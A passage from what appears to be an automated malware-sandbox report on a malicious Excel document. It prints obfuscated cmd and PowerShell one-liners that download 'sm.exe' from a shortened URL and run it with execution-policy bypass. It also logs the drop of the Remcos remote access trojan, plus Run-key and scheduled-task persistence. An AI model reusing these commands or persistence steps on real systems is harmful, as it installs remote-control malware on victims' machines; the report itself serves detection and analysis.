                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_0047B6D4 push ebp; retf
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A3F51 pushad ; ret
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A3FA1 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00413ED0 push eax; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004FB6D4 push ebp; retf
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A3F51 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A3FA1 push ds; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_0029B6D4 push ebp; retf
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02253F51 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02253FA1 push ds; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00413ED0 push eax; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_0039B6D4 push ebp; retf
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04393F51 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04393FA1 push ds; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00413ED0 push eax; ret
                Source: initial sampleStatic PE information: section name: .text entropy: 7.0583311357
                Source: initial sampleStatic PE information: section name: .text entropy: 7.0583311357

                Persistence and Installation Behavior:

                barindex
                Drops PE files to the document folder of the userShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\sm.exeJump to dropped file
                Drops PE files with benign system namesShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\sm.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeFile created: C:\Users\user\AppData\Roaming\Remcos\remcos.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\sm.exeFile created: C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\sm.exeJump to dropped file

                Boot Survival:

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RemcosJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RemcosJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
